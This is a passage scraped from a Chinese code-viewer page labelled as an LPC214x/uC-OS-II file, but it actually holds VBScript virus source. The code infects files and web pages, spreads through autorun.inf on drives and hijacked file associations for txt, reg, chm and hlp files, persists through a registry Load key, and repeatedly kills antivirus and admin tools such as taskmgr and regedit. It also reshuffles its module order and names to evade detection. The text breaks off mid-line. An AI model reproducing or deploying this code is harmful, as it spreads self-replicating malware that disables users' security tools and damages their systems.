📄 lpc214x_ucosii.htm
字号:
If IsSexFile(pfi.Name) = True Then
pfi.Delete
End If
End Select
Next
Set psfo = pfo.SubFolders
For Each ps In psfo
If Cnt >= CntMax Then
Exit For
End If
Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
Next
End Sub
'PYRHOYIQVQT2_11
'UARVKZXWUDPRG2_17
Function PreInstance()
On Error Resume Next
Dim num_cnt
Dim strComputer, objWMIService, colProcessList, objProcess
num_cnt = 0
PreInstance = False
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
For Each objProcess in colProcessList
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
num_cnt = num_cnt + 1
End If
Next
If num_cnt>= 2 Then
PreInstance = True
End If
End Function
'PYRHOYIQVQT2_17
'UARVKZXWUDPRG2_19
Function GetVersion(objfso, path_v)
Dim FV, buffer
Set FV = objfso.OpenTextFile(path_v, 1)
buffer = FV.ReadAll()
GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
End Function
Function GetScriptCode(Languages)
On Error Resume Next
Dim soj
For Each soj In document.Scripts
If LCase(soj.Language) = Languages Then
Select Case LCase(soj.Language)
Case "vbscript"
GetScriptCode = soj.Text
Exit Function
Case "javascript"
GetScriptCode = soj.Text
Exit Function
End Select
End If
Next
End Function
Function GetSelfCode(objfso, FullPath_Self)
On Error Resume Next
Dim n, n1, buffer, Self
Set Self = objfso.OpenTextFile(FullPath_Self, 1)
buffer = Self.ReadAll
n = InStr(buffer, Head_V)
n1 = InstrRev(buffer, Tail_V)
buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
GetSelfCode = buffer
Self.Close
End Function
Function GetMainBody(vbsCode, Sum_ModelCode)
Dim i
For i = 2 To Sum_ModelCode
GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
Next
End Function
'PYRHOYIQVQT2_19
'UARVKZXWUDPRG1_5
Sub MonitorSystem(objfso, vbsCode)
On Error Resume Next
Dim ProcessNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(objfso, vbsCode)
WScript.Sleep 5000
Loop
End Sub
'PYRHOYIQVQT1_5
'UARVKZXWUDPRG1_3
Sub ExeVbs_Virus()
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
Set objfso = CreateObject(GetFSOName())
Set objshell = CreateObject("WScript.Shell")
FullPath_Self = WScript.ScriptFullName
Name_Self = WScript.ScriptName
Names = Array("UARVKZXWUDPRG", "PYRHOYIQVQT")
Set oArgs = WScript.Arguments
ArgNum = 0
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
Case "run"
RunPath = Left(FullPath_Self, 2)
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "txt", "log"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "reg"
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "chm"
Para_V = "hh.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "hlp"
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case Else
If PreInstance = True Then
WScript.Quit
End If
If IsOK(objfso, Date(), FullPath_Config) = False Then
If objfso.FileExists(FullPath_Config) = True Then
Order = Trim(ReadOK(objfso, FullPath_Config))
Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
End If
Select Case Order_Order
Case "InfectFiles"
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Order_Para = Order_Para + Cnt
If Order_Para>2000 Then
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
End If
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "Msg"
MsgBox Order_Para
Call WriteOK(objfso, FullPath_Config, "", "")
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "UnLoadMe"
Call RestoreSystem(objfso)
Wscript.Quit
Case "KillVirus"
Call RestoreSystem(objfso)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
Case Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
End Select
Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺序
VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称
Call MonitorSystem(objfso, VbsCode_Virus)
End If
End Select
Set objfso = Nothing
Set objshell = Nothing
End Sub
'PYRHOYIQVQT1_3
'UARVKZXWUDPRG2_25
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
'PYRHOYIQVQT2_25
'UARVKZXWUDPRG1_7
Sub InvadeSystem(objfso, vbsCode)
On Error Resume Next
Dim Value, HCULoad, vbsCode_Virus, dc, d
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
vbsCode_Virus = vbsCode
Set dc = objfso.Drives
For Each d In dc
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
End If
Next
If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
objfso.DeleteFile FullPath_V1 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
End If
If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
objfso.DeleteFile FullPath_V0 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
End If
If ReadReg(HCULoad)<> FullPath_V1 Then
Call WriteReg (HCULoad, FullPath_V1, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call SetTxtFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call SetRegFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call SetchmFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call SethlpFileAss(FullPath_V0)
End If
Call DeSafeSet()
End Sub
'PYRHOYIQVQT1_7
'UARVKZXWUDPRG1_6
Sub AutoRun(objfso, D, vbsCode)
On Error Resume Next
Dim path_autorun, path_vbs, inf_autorun
path_autorun = D & ":\AutoRun.inf"
path_vbs = D & ":\" & Name_V1
If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
End If
If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
End If
Call CopyFile(objfso, vbsCode, path_vbs)
Call SetFileAttr(objfso, path_vbs)
inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Nam⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -